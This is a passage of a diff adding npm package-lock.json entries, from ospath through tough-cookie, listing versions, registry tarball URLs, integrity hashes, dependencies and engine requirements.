"sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", + "dependencies": { + "mimic-fn": "^2.1.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/ospath": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/ospath/-/ospath-1.2.2.tgz", + "integrity": "sha512-o6E5qJV5zkAbIDNhGSIlyOhScKXgQrSRMilfph0clDfM0nEnBOlKlH4sWDmG95BW/CvwNz0vmm7dJVtU2KlMiA==" + }, + "node_modules/p-map": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/p-map/-/p-map-4.0.0.tgz", + "integrity": "sha512-/bjOqmgETBYB5BoEeGVea8dmvHb2m9GLy1E9W43yeyfP6QQCZGFNa+XRceJEuDB6zqr+gKpIAmlLebMpykw/MQ==", + "dependencies": { + "aggregate-error": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pako": { + "version": "1.0.11", + "resolved": "https://registry.npmjs.org/pako/-/pako-1.0.11.tgz", + "integrity": "sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw==" + }, + "node_modules/parseurl": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz", + "integrity": "sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/path-key": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", + "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "engines": { + "node": ">=8" + } + }, + "node_modules/path-to-regexp": { + "version": "0.1.12", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.12.tgz", + "integrity": "sha512-RA1GjUVMnvYFxuqovrEqZoxxW5NUZqbwKtYz/Tt7nXerk0LbLblQmrsgdeOxV5SFHf0UDggjS/bSeOZwt1pmEQ==" + }, + "node_modules/pdf-parse": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/pdf-parse/-/pdf-parse-1.1.1.tgz", + "integrity": "sha512-v6ZJ/efsBpGrGGknjtq9J/oC8tZWq0KWL5vQrk2GlzLEQPUDB1ex+13Rmidl1neNN358Jn9EHZw5y07FFtaC7A==", + "dependencies": { + "debug": "^3.1.0", + "node-ensure": "^0.0.0" + }, + "engines": { + "node": ">=6.8.1" + } + }, + "node_modules/pdf-parse/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/pend": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz", + "integrity": "sha512-F3asv42UuXchdzt+xXqfW1OGlVBe+mxa2mqI0pg5yAHZPvFmY3Y6drSf/GQ1A86WgWEN9Kzh/WrgKa6iGcHXLg==" + }, + "node_modules/performance-now": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", + "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" + }, + "node_modules/pify": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/pify/-/pify-2.3.0.tgz", + "integrity": "sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pretty-bytes": { + "version": "5.6.0", + "resolved": "https://registry.npmjs.org/pretty-bytes/-/pretty-bytes-5.6.0.tgz", + "integrity": "sha512-FFw039TmrBqFK8ma/7OL3sDz/VytdtJr044/QUJtH0wK9lb9jLq9tJyIxUwtQJHwar2BqtiA4iCWSwo9JLkzFg==", + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pretty-format": { + "version": "27.5.1", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-27.5.1.tgz", + "integrity": "sha512-Qb1gy5OrP5+zDf2Bvnzdl3jsTf1qXVMazbvCoKhtKqVs4/YK4ozX4gKQJJVyNe+cajNPn0KoC0MC3FUmaHWEmQ==", + "dependencies": { + "ansi-regex": "^5.0.1", + "ansi-styles": "^5.0.0", + "react-is": "^17.0.1" + }, + "engines": { + "node": "^10.13.0 || ^12.13.0 || ^14.15.0 || >=15.0.0" + } + }, + "node_modules/pretty-format/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/process": { + "version": "0.11.10", + "resolved": "https://registry.npmjs.org/process/-/process-0.11.10.tgz", + "integrity": "sha512-cdGef/drWFoydD1JsMzuFf8100nZl+GT+yacc2bEced5f9Rjk4z+WtFUTBu9PhOi9j/jfmBPu0mMEY4wIdAF8A==", + "engines": { + "node": ">= 0.6.0" + } + }, + "node_modules/proxy-addr": { + "version": "2.0.7", + "resolved": "https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz", + "integrity": "sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==", + "dependencies": { + "forwarded": "0.2.0", + "ipaddr.js": "1.9.1" + }, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/proxy-from-env": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.0.0.tgz", + "integrity": "sha512-F2JHgJQ1iqwnHDcQjVBsq3n/uoaFL+iPW/eAeL7kVxy/2RrWaN4WroKjjvbsoRtv0ftelNyC01bjRhn/bhcf4A==" + }, + "node_modules/psl": { + "version": "1.9.0", + "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", + "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" + }, + "node_modules/pump": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.0.tgz", + "integrity": "sha512-LwZy+p3SFs1Pytd/jYct4wpv49HiYCqd9Rlc5ZVdk0V+8Yzv6jR5Blk3TRmPL1ft69TxP0IMZGJ+WPFU2BFhww==", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } + }, + "node_modules/punycode": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", + "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", + "engines": { + "node": ">=6" + } + }, + "node_modules/qs": { + "version": "6.10.4", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.10.4.tgz", + "integrity": "sha512-OQiU+C+Ds5qiH91qh/mg0w+8nwQuLjM4F4M/PbmhDOoYehPh+Fb0bDjtR1sOvy7YKxvj28Y/M0PhP5uVX0kB+g==", + "dependencies": { + "side-channel": "^1.0.4" + }, + "engines": { + "node": ">=0.6" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/querystringify": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/querystringify/-/querystringify-2.2.0.tgz", + "integrity": "sha512-FIqgj2EUvTa7R50u0rGsyTftzjYmv/a3hO345bZNrqabNqjtgiDMgmo4mkUjd+nzU5oF3dClKqFIPUKybUyqoQ==" + }, + "node_modules/range-parser": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz", + "integrity": "sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/raw-body": { + "version": "2.5.2", + "resolved": "https://registry.npmjs.org/raw-body/-/raw-body-2.5.2.tgz", + "integrity": "sha512-8zGqypfENjCIqGhgXToC8aB2r7YrBX+AQAfIPs/Mlk+BtPTztOvTS01NRW/3Eh60J+a48lt8qsCzirQ6loCVfA==", + "dependencies": { + "bytes": "3.1.2", + "http-errors": "2.0.0", + "iconv-lite": "0.4.24", + "unpipe": "1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/react-is": { + "version": "17.0.2", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-17.0.2.tgz", + "integrity": "sha512-w2GsyukL62IJnlaff/nRegPQR94C/XXamvMWmSHRJ4y7Ts/4ocGRmTHvOs8PSE6pB3dWOrD/nueuU5sduBsQ4w==" + }, + "node_modules/readable-stream": { + "version": "3.6.2", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", + "integrity": "sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==", + "dependencies": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/regenerator-runtime": { + "version": "0.14.0", + "resolved": "https://registry.npmjs.org/regenerator-runtime/-/regenerator-runtime-0.14.0.tgz", + "integrity": "sha512-srw17NI0TUWHuGa5CFGGmhfNIeja30WMBfbslPNhf6JrqQlLN5gcrvig1oqPxiVaXb0oW0XRKtH6Nngs5lKCIA==" + }, + "node_modules/regexp.prototype.flags": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/regexp.prototype.flags/-/regexp.prototype.flags-1.5.1.tgz", + "integrity": "sha512-sy6TXMN+hnP/wMy+ISxg3krXx7BAtWVO4UouuCN/ziM9UEne0euamVNafDfvC83bRNr95y0V5iijeDQFUNpvrg==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.2.0", + "set-function-name": "^2.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/request-progress": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/request-progress/-/request-progress-3.0.0.tgz", + "integrity": "sha512-MnWzEHHaxHO2iWiQuHrUPBi/1WeBf5PkxQqNyNvLl9VAYSdXkP8tQ3pBSeCPD+yw0v0Aq1zosWLz0BdeXpWwZg==", + "dependencies": { + "throttleit": "^1.0.0" + } + }, + "node_modules/requires-port": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/requires-port/-/requires-port-1.0.0.tgz", + "integrity": "sha512-KigOCHcocU3XODJxsu8i/j8T9tzT4adHiecwORRQ0ZZFcp7ahwXuRU1m+yuO90C5ZUyGeGfocHDI14M3L3yDAQ==" + }, + "node_modules/restore-cursor": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/restore-cursor/-/restore-cursor-3.1.0.tgz", + "integrity": "sha512-l+sSefzHpj5qimhFSE5a8nufZYAM3sBSVMAPtYkmC+4EH2anSGaEMXSD0izRQbu9nfyQ9y5JrVmp7E8oZrUjvA==", + "dependencies": { + "onetime": "^5.1.0", + "signal-exit": "^3.0.2" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/rfdc": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/rfdc/-/rfdc-1.3.0.tgz", + "integrity": "sha512-V2hovdzFbOi77/WajaSMXk2OLm+xNIeQdMMuB7icj7bk6zi2F8GGAxigcnDFpJHbNyNcgyJDiP+8nOrY5cZGrA==" + }, + "node_modules/rxjs": { + "version": "7.8.1", + "resolved": "https://registry.npmjs.org/rxjs/-/rxjs-7.8.1.tgz", + "integrity": "sha512-AA3TVj+0A2iuIoQkWEK/tqFjBq2j+6PO6Y0zJcvzLAFhEFIO3HL0vls9hWLncZbAAbK0mar7oZ4V079I/qPMxg==", + "dependencies": { + "tslib": "^2.1.0" + } + }, + "node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/safer-buffer": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", + "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" + }, + "node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/send": { + "version": "0.19.0", + "resolved": "https://registry.npmjs.org/send/-/send-0.19.0.tgz", + "integrity": "sha512-dW41u5VfLXu8SJh5bwRmyYUbAoSB3c9uQh6L8h/KtsFREPWpbX1lrljJo186Jc4nmci/sGUZ9a0a0J2zgfq2hw==", + "dependencies": { + "debug": "2.6.9", + "depd": "2.0.0", + "destroy": "1.2.0", + "encodeurl": "~1.0.2", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "fresh": "0.5.2", + "http-errors": "2.0.0", + "mime": "1.6.0", + "ms": "2.1.3", + "on-finished": "2.4.1", + "range-parser": "~1.2.1", + "statuses": "2.0.1" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/send/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/send/node_modules/debug/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/send/node_modules/encodeurl": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-1.0.2.tgz", + "integrity": "sha512-TPJXq8JqFaVYm2CWmPvnP2Iyo4ZSM7/QKcSmuMLDObfpH5fi7RUGmd/rTDf+rut/saiDiQEeVTNgAmJEdAOx0w==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/send/node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "node_modules/serve-static": { + "version": "1.16.2", + "resolved": "https://registry.npmjs.org/serve-static/-/serve-static-1.16.2.tgz", + "integrity": "sha512-VqpjJZKadQB/PEbEwvFdO43Ax5dFBZ2UECszz8bQ7pi7wt//PWe1P6MN7eCnjsatYtBT6EuiClbjSWP2WrIoTw==", + "dependencies": { + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "parseurl": "~1.3.3", + "send": "0.19.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/set-function-length": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/set-function-length/-/set-function-length-1.1.1.tgz", + "integrity": "sha512-VoaqjbBJKiWtg4yRcKBQ7g7wnGnLV3M8oLvVWwOk2PdYY6PEFegR1vezXR0tw6fZGF9csVakIRjrJiy2veSBFQ==", + "dependencies": { + "define-data-property": "^1.1.1", + "get-intrinsic": "^1.2.1", + "gopd": "^1.0.1", + "has-property-descriptors": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/set-function-name": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/set-function-name/-/set-function-name-2.0.1.tgz", + "integrity": "sha512-tMNCiqYVkXIZgc2Hnoy2IvC/f8ezc5koaRFkCjrpWzGpCd3qbZXPzVy9MAZzK1ch/X0jvSkojys3oqJN0qCmdA==", + "dependencies": { + "define-data-property": "^1.0.1", + "functions-have-names": "^1.2.3", + "has-property-descriptors": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/setprototypeof": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz", + "integrity": "sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw==" + }, + "node_modules/sha.js": { + "version": "2.4.11", + "resolved": "https://registry.npmjs.org/sha.js/-/sha.js-2.4.11.tgz", + "integrity": "sha512-QMEp5B7cftE7APOjk5Y6xgrbWu+WkLVQwk8JNjZ8nKRciZaByEW6MubieAiToS7+dwvrjGhH8jRXz3MVd0AYqQ==", + "dependencies": { + "inherits": "^2.0.1", + "safe-buffer": "^5.0.1" + }, + "bin": { + "sha.js": "bin.js" + } + }, + "node_modules/shebang-command": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", + "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dependencies": { + "shebang-regex": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/shebang-regex": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", + "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "engines": { + "node": ">=8" + } + }, + "node_modules/side-channel": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/side-channel/-/side-channel-1.1.0.tgz", + "integrity": "sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==", + "dependencies": { + "es-errors": "^1.3.0", + "object-inspect": "^1.13.3", + "side-channel-list": "^1.0.0", + "side-channel-map": "^1.0.1", + "side-channel-weakmap": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/side-channel-list": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/side-channel-list/-/side-channel-list-1.0.0.tgz", + "integrity": "sha512-FCLHtRD/gnpCiCHEiJLOwdmFP+wzCmDEkc9y7NsYxeF4u7Btsn1ZuwgwJGxImImHicJArLP4R0yX4c2KCrMrTA==", + "dependencies": { + "es-errors": "^1.3.0", + "object-inspect": "^1.13.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/side-channel-map": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/side-channel-map/-/side-channel-map-1.0.1.tgz", + "integrity": "sha512-VCjCNfgMsby3tTdo02nbjtM/ewra6jPHmpThenkTYh8pG9ucZ/1P8So4u4FGBek/BjpOVsDCMoLA/iuBKIFXRA==", + "dependencies": { + "call-bound": "^1.0.2", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.5", + "object-inspect": "^1.13.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/side-channel-weakmap": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/side-channel-weakmap/-/side-channel-weakmap-1.0.2.tgz", + "integrity": "sha512-WPS/HvHQTYnHisLo9McqBHOJk2FkHO/tlpvldyrnem4aeQp4hai3gythswg6p01oSoTl58rcpiFAjF2br2Ak2A==", + "dependencies": { + "call-bound": "^1.0.2", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.5", + "object-inspect": "^1.13.3", + "side-channel-map": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/signal-exit": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==" + }, + "node_modules/simple-concat": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/simple-concat/-/simple-concat-1.0.1.tgz", + "integrity": "sha512-cSFtAPtRhljv69IK0hTVZQ+OfE9nePi/rtJmw5UjHeVyVroEqJXP1sFztKUy1qU+xvz3u/sfYJLa947b7nAN2Q==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/simple-get": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/simple-get/-/simple-get-4.0.1.tgz", + "integrity": "sha512-brv7p5WgH0jmQJr1ZDDfKDOSeWWg+OVypG99A/5vYGPqJ6pxiaHLy8nxtFjBA7oMa01ebA9gfh1uMCFqOuXxvA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "decompress-response": "^6.0.0", + "once": "^1.3.1", + "simple-concat": "^1.0.0" + } + }, + "node_modules/slice-ansi": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-3.0.0.tgz", + "integrity": "sha512-pSyv7bSTC7ig9Dcgbw9AuRNUb5k5V6oDudjZoMBSr13qpLBG7tB+zgCkARjq7xIUgdz5P1Qe8u+rSGdouOOIyQ==", + "dependencies": { + "ansi-styles": "^4.0.0", + "astral-regex": "^2.0.0", + "is-fullwidth-code-point": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/sshpk": { + "version": "1.18.0", + "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", + "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", + "dependencies": { + "asn1": "~0.2.3", + "assert-plus": "^1.0.0", + "bcrypt-pbkdf": "^1.0.0", + "dashdash": "^1.12.0", + "ecc-jsbn": "~0.1.1", + "getpass": "^0.1.1", + "jsbn": "~0.1.0", + "safer-buffer": "^2.0.2", + "tweetnacl": "~0.14.0" + }, + "bin": { + "sshpk-conv": "bin/sshpk-conv", + "sshpk-sign": "bin/sshpk-sign", + "sshpk-verify": "bin/sshpk-verify" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/statuses": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.1.tgz", + "integrity": "sha512-RwNA9Z/7PrK06rYLIzFMlaF+l73iwpzsqRIFgbMLbTcLD6cOao82TaWefPXQvB2fOC4AjuYSEndS7N/mTCbkdQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/stop-iteration-iterator": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/stop-iteration-iterator/-/stop-iteration-iterator-1.0.0.tgz", + "integrity": "sha512-iCGQj+0l0HOdZ2AEeBADlsRC+vsnDsZsbdSiH1yNSjcfKM7fdpCMfqAL/dwF5BLiw/XhRft/Wax6zQbhq2BcjQ==", + "dependencies": { + "internal-slot": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/string_decoder": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", + "dependencies": { + "safe-buffer": "~5.2.0" + } + }, + "node_modules/string-width": { + "version": "4.2.3", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/strip-ansi": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/strip-final-newline": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", + "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/throttleit": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/throttleit/-/throttleit-1.0.0.tgz", + "integrity": "sha512-rkTVqu6IjfQ/6+uNuuc3sZek4CEYxTJom3IktzgdSxcZqdARuebbA/f4QmAxMQIxqq9ZLEUkSYqvuk1I6VKq4g==" + }, + "node_modules/through": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/through/-/through-2.3.8.tgz", + "integrity": "sha512-w89qg7PI8wAdvX60bMDP+bFoD5Dvhm9oLheFp5O4a2QF0cSBGsBX4qZmadPMvVqlLJBBci+WqGGOAPvcDeNSVg==" + }, + "node_modules/tmp": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.2.3.tgz", + "integrity": "sha512-nZD7m9iCPC5g0pYmcaxogYKggSfLsdxl8of3Q/oIbqCqLLIO9IAF0GWjX1z9NZRHPiXv8Wex4yDCaZsgEw0Y8w==", + "engines": { + "node": ">=14.14" + } + }, + "node_modules/toidentifier": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz", + "integrity": "sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==", + "engines": { + "node": ">=0.6" + } + }, + "node_modules/tough-cookie": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-4.1.3.tgz", + "integrity": "sha512-aX/y5pVRkfRnfmuX+OdbSdXvPe6ieKX/G2s7e98f4poJHnqH3281gDPm/metm6E/WRamfx7WC4HUqkWHfQHprw==", + "dependencies": { + "psl": "^1.1.33", + "punycode": "^2.1.1", + "universalify": "^0.2.0", + "url-parse": "^1.5.3" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/tough-cookie/node_modules/universalify": { + "version": "0.2.0", + "resolved": 